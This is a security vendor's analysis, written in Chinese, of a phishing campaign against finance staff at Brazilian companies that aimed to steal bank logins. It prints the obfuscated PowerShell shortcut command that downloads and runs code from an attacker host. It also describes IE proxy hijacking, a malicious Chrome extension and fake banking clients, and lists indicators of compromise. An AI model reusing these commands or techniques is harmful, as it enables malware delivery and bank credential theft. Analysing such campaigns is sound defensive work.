針對巴西商業公司財務的攻擊事件分析

1. 概述

9月14日到9月20（特別是9月19、20日兩天），360威脅情報中心發現一批具有相似特徵的釣魚郵件，這些釣魚郵件的語言均為葡萄牙語，投遞目標為巴西的商業公司，使用的payload主要為powershell和AutoIt編寫，這引起了我們分析人員的注意。經過分析，確定這是一起針對巴西境內商業公司財務人員的定向攻擊，攻擊目標為盜取銀行賬戶。

2. 目標

a. 葡萄牙語

b. 巴西商業公司的人力資源、財務人員

c. 郵件內容通常如下：

翻譯：

親愛的先生 確定你沒有收到我的第一封電子郵件，我會按照約定寄給你我的簡歷。 所需的其他信息包含在附件課程的第二張表中。

翻譯：

此消息是指服務提供商的電子服務稅務說明 - NFS-e號51523245：n公司名稱：PAYPAL DO BRASIL SERVICOS DE PAGAMENTOS LTDAn電子信箱：notificacoes@paypal.comnCCM：3,932,128-2nCNPJ：10,878,448 / 0001-66n n我們建議您在Million Note System中註冊一個安全短語，將出現在發送給您的所有消息中。n n安全短語保證該消息由聖保羅市發送，並阻止收件人打開可能包含計算機病毒的郵件。n n附上是發票nf = 51523245＆cod = MIJ6BFFPn……n

3. 分析

將郵件中的附件解壓後，是一個html的快捷方式，該快捷方式的鏈接目標如下，雙擊快捷方式後，會以base64編碼後的惡意代碼作為參數啟動powershell.exe執行，然後再啟動iexplore.exe迷惑受害人。

C:windowssystem32cmd.exe /V /C "set mq=hell ^-e^n^c &&set wx=pOwErs&&start !wx!!mq! bwB1AHUAOwBpAEUAeAAoAE4AZQBXAC0AbwBCAEoAZQBDAHQAIABOAEUAdAAuAFcAZQBiAEMAbABJAEUATgB0ACkALgBEAE8AdwBuAEwATwBBAEQAcwB0AFIASQBuAEcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxADMANQAzADEANwA5ADIALgByAC4AcwAtAGMAZABuAC4AbgBlAHQALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBEAG8AdgBMAHoAawB4AE0AegBVAHoATQBUAGMANQBNAGkANQB5AEwAbgBNAHQAWQAyAFIAdQBMAG0ANQBsAGQAQwA5ADIATQBuAHgAdwBWAEUAcABaACcAKQA="-%ProgramFiles%InternetnExploreriexplore.exen

解碼後

iEx(NeW-oBJeCt NEt.WebClIENt).DOwnLOADstRInG(http://913531792.r.s-cdn.net/v2/gl.php?aHR0cDovLzkxMzUzMTc5Mi5yLnMtY2RuLm5ldC92MnxwVEpZ)n

Powershell啟動後，會從hxxp://913531792[.]r.s-cdn[.]net/v2/gl.php?aHR0cDovLzkxMzUzMTc5Mi5yLnMtY2RuLm5ldC92MnxwVEpZ下載一段代碼，如下：

可以看見這段代碼的功能很簡單，從hxxp://913531792[.]r.s-cdn[.]net/v2/gd.php下載並異或0x6A解密出一個名為Loader的dll，然後將其載入，接著通過Loader的Go方法(參數為"hxxp://913531792[.]r.s-cdn[.]net/v2","pTJY")開始下一步流程，最後生成一個vbs腳本用於啟動Loader中指定的文件，並生成指向該vbs腳本的快捷方式，打開快捷方式啟動vbs腳本。

由於Loader中下載的文件已經無法下載，而我們目前只知道該樣本是一個downloader，更具體的惡意行為無法獲得，也就不能確定攻擊者的最終目的，通常的分析到這裡就只能終止了。應付這種情況的一個常用方法是尋找同源樣本，無論是歷史樣本還是更新的存活樣本，都能夠對樣本的行為進行有效的還原，而且在尋找同源樣本時獲取的其他信息也能進一步對攻擊者的畫像進行勾勒。

通過360威脅情報中心(http://ti.360.net)搜索http://913531792.r.s-cdn.net,我們找到了更多的樣本，以及該域名曾解析到的ip地址46.231.178.38、87.238.165.100、46.231.178.51、37.220.34.247等信息。

進一步搜索這些IP地址的信息，發現另一個作為C&C的域名http://hictip.r.worldssl.net及其關聯樣本：

其中有一個MD5為b5ef9c4c82b2bef4743b30481232ecc8的AutoIt樣本，對其的分析讓我們得到了更多的結果。該樣本會從hxxps://github[.]com/fl20177/Flash/raw/Update/fl.exe下載一個文件，然後訪問hxxp://94[.]229.78.156/cd/controller.php。下載回來的fl.exe也是一個AutoIt編譯成PE的可執行程序，其反編譯後的代碼正是前面提到過的powershell調用代碼。

那麼現在我們得到了關於攻擊者的一些新的信息，一個github地址和一個ip：

hxxps://github[.]com/fl20177

94[.]229.78.156

訪問攻擊者在Github上的賬號https://github.com/fl20177，可以發現這個賬號是攻擊者特地為這次攻擊註冊的，在9月5日註冊。

接著發現其github上的項目https://github.com/fl20177/Flash 中還有一個新的樣本：zer.exe。下載回來反編譯後如下，注釋部分是對代碼功能的說明：

該樣本首先修改註冊表項修改HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL，這個註冊表項對應的是IE的自動代理配置，可以指定一個腳本讓IE對符合條件的域名使用指定的代理。這裡的指定的代理配置腳本為hxxp://www[.]vijfheerenlandendigitaal.nl/ec/tfiles.txt, 內容如下，其指定了當訪問桑坦德銀行、巴西布拉德斯科銀行、花旗銀行、巴西聯邦儲蓄銀行等網址時，使用代理伺服器94.229.78.156，攻擊者獲取到受害者的訪問流量後，可以返回偽造的釣魚頁面獲取受害者的銀行賬號密碼。

同時，樣本還從hxxps://www[.]http://yourlifeinthesun.com/manifest.zip下載一個chrome的擴展插件，並替換掉chrome的快捷方式，為其加上「--load-extension=」的啟動參數，讓chrome啟動時默認載入這個插件，插件主要作用是當受害人用chrome訪問上面提到的銀行網址時，禁用掉使其不可訪問，從而誘導受害人使用IE瀏覽器進行訪問。

而且樣本還會下載並替換掉Aplicativo Bradesco.exe(巴西布拉德斯科銀行的PC客戶端軟體)、itauaplicativo.exe（巴西伊塔烏投資銀行的PC客戶端軟體），替換後的軟體點擊後只會彈出窗口提示：「系統不可用，請通過瀏覽器登錄您的帳號。」，這也是一種誘導受害人通過瀏覽器登錄銀行賬號的手段。

綜上所述，360威脅情報中心認為此次事件其攻擊目標為巴西的商業公司財務人員，目的為盜取目標銀行賬號密碼，是一起限定範圍內的定向攻擊事件，而不是針對特定行業人員以竊取資料為目的的APT事件。

4. IOC

Domain

http://913531792.r.s-cdn.net

http://hictip.r.worldssl.net

http://www.yourlifeinthesun.com

IP

94.229.78.156

URL

http://913531792.r.s-cdn.net/v2

http://913531792.r.s-cdn.net/v2/gd.php

http://913531792.r.s-cdn.net/v2/gl.php

https://hictip.r.worldssl.net/v2

https://hictip.r.worldssl.net/v2/gl.php

https://hictip.r.worldssl.net/v2/gd.php

http://www.vijfheerenlandendigitaal.nl/ec/tfiles.txt

http://94.229.78.156/cc/controller.php

http://94.229.78.156/cd/controller.php

https://www.yourlifeinthesun.com/itauaplicativo.exe

https://www.yourlifeinthesun.com/DevWarningPatch.bat

https://www.yourlifeinthesun.com/manifest.zip

https://www.yourlifeinthesun.com/AplicativoBradesco.exe

https://github.com/fl20177/Flash/raw/Update/fl.exe

MD5

5b9e5e272d4e56b84f83c916c7eefb8f

4f48f618fc3247d1c013562a2e34dc4e

5dc7429d915289b58880721a7d1dc35c

b6153ed6c5ecac7fc38c7316057f5dd5

7b7f18f8ec641ce0930a75071cae0a8f

推薦閱讀：